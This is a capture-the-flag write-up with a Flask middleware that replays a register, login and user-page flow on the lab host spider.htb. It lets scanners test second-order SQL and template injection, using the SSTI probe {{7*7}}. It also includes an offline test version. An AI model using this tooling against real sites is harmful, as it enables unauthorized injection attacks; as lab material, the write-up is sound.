Creating a simple middleware for easy exploitation of second-order injections like SQLi, SSTI, etc.

  1. Checking the user registration page, we have username and password fields.
```python
from flask import Flask
from flask import request
import requests
import re

app = Flask(__name__)

# Pattern for the uuid the application hands out after registration
UUID_RE = r"[\w]{8}-[\w]{4}-[\w]{4}-[\w]{4}-[\w]{12}"
# Throwaway password used for every account the middleware creates
PASSWORD = "12345a"


@app.route('/')
def index():
    # Getting payload from attacker as a GET username parameter
    uname = request.args.get('username', '')
    # Creating a post data payload for the registration form
    post_data_reg = {"username": uname, "confirm_username": uname,
                     "password": PASSWORD, "confirm_password": PASSWORD}
    # Sending registration request
    r1 = requests.post('http://spider.htb/register', data=post_data_reg)
    # Finding and filtering the uuid in the http response of registration using a regular expression
    found = re.findall(UUID_RE, r1.text)
    if not found:
        # Registration did not give us an id (filtered payload, error page, ...): show the raw response instead
        return "no uuid found in registration response:\n" + r1.text
    user_uuid = found[0]
    # return r1.text
    # Creating post data payload for login request: the account is logged in with its uuid and the
    # password chosen above (field names assumed to match the registration form)
    post_data_login = {"username": user_uuid, "password": PASSWORD}
    # Sending login request; the redirect is not followed so the Set-Cookie of this response is kept
    r2 = requests.post('http://spider.htb/login', data=post_data_login, allow_redirects=False)
    # Filtering out session cookie required for user info request
    cookie = "; ".join(f"{k}={v}" for k, v in r2.cookies.items())
    custom_header = {"Cookie": cookie}
    # Sending GET request to /user with user session cookie
    r3 = requests.get('http://spider.htb/user', headers=custom_header)
    # Sending the http response of the user info page back to the browser
    return r3.text


if __name__ == '__main__':
    # An empty host makes Flask fall back to 127.0.0.1; binding port 81 needs root on Linux
    app.run(host='', port=81)
```
Run the middleware through proxychains (the command is `proxychains python3` followed by the script name, which the post does not include) so that its outbound requests to spider.htb go through the configured proxy. Then send the SSTI probe `{{7*7}}` as the `username` GET parameter, for example by browsing to `http://127.0.0.1:81/?username={{7*7}}`. If the page that comes back contains `49`, the stored username is being evaluated as a template when the user page is rendered, which is the second-order SSTI. Because every GET to the middleware replays the register, login and user-page steps, an automated tool can be pointed at this single parameter instead of having to drive the three-step flow itself.
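The same chain, written so that the HTTP transport is pluggable and testable offline. This is an added example, not code from the post: `FakeTarget` is a constructed stand-in for the remote application (it is not spider.htb) that hands out a uuid on registration, sets a `session` cookie on login and reflects the stored username on `/user`; the paths, field names and cookie name are assumptions. `run_chain` is the part you would keep, swapping `FakeTarget` for a thin wrapper around `requests` with the same `post`/`get` shape.

```python
"""Register -> login -> /user chain with a pluggable transport (added example, not the post's code)."""
import re
import uuid

# Stricter than the post's [\w]-based pattern: uuid4 output is lowercase hex with dashes
UUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")


class FakeTarget:
    """Constructed in-memory stand-in for the remote application (assumption, not spider.htb)."""

    def __init__(self):
        self.users = {}      # uuid -> (username, password)
        self.sessions = {}   # session token -> uuid

    def post(self, path, data):
        """Return (status, headers, body), the same shape an HTTP client wrapper would return."""
        if path == "/register":
            uid = str(uuid.uuid4())
            self.users[uid] = (data["username"], data["password"])
            return 200, {}, f"Registered. Your login id is {uid}"
        if path == "/login":
            uid = data["username"]
            if uid in self.users and self.users[uid][1] == data["password"]:
                token = uuid.uuid4().hex
                self.sessions[token] = uid
                return 302, {"Set-Cookie": f"session={token}; Path=/"}, ""
            return 401, {}, "bad credentials"
        return 404, {}, ""

    def get(self, path, headers):
        if path == "/user":
            m = re.search(r"session=([0-9a-f]+)", headers.get("Cookie", ""))
            uid = self.sessions.get(m.group(1)) if m else None
            if uid is None:
                return 401, {}, "login first"
            # Second-order sink: the username stored at registration is reflected here verbatim
            return 200, {}, f"<p>Welcome {self.users[uid][0]}</p>"
        return 404, {}, ""


def run_chain(target, payload, password="12345a"):
    """Replay the whole flow for one payload and return the /user page body."""
    # Step 1: register an account whose username is the payload
    status, _, body = target.post("/register", {"username": payload,
                                                "confirm_username": payload,
                                                "password": password,
                                                "confirm_password": password})
    ids = UUID_RE.findall(body)
    if status != 200 or not ids:
        raise RuntimeError(f"registration failed or no uuid in response (status {status})")
    user_id = ids[0]

    # Step 2: log in with the uuid; keep only "name=value" from the Set-Cookie header
    status, headers, _ = target.post("/login", {"username": user_id, "password": password})
    cookie = headers.get("Set-Cookie", "").split(";", 1)[0]
    if not cookie:
        raise RuntimeError(f"login did not set a session cookie (status {status})")

    # Step 3: fetch the page where the stored username is used (the second-order sink)
    status, _, body = target.get("/user", {"Cookie": cookie})
    if status != 200:
        raise RuntimeError(f"user page fetch failed (status {status})")
    return body


if __name__ == "__main__":
    print(run_chain(FakeTarget(), "{{7*7}}"))
```

Each call to `run_chain` creates a fresh account, exactly as the Flask route does, so the target's user table grows by one row per probe; that is worth remembering before pointing a scanner that sends thousands of requests at a shared lab box.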


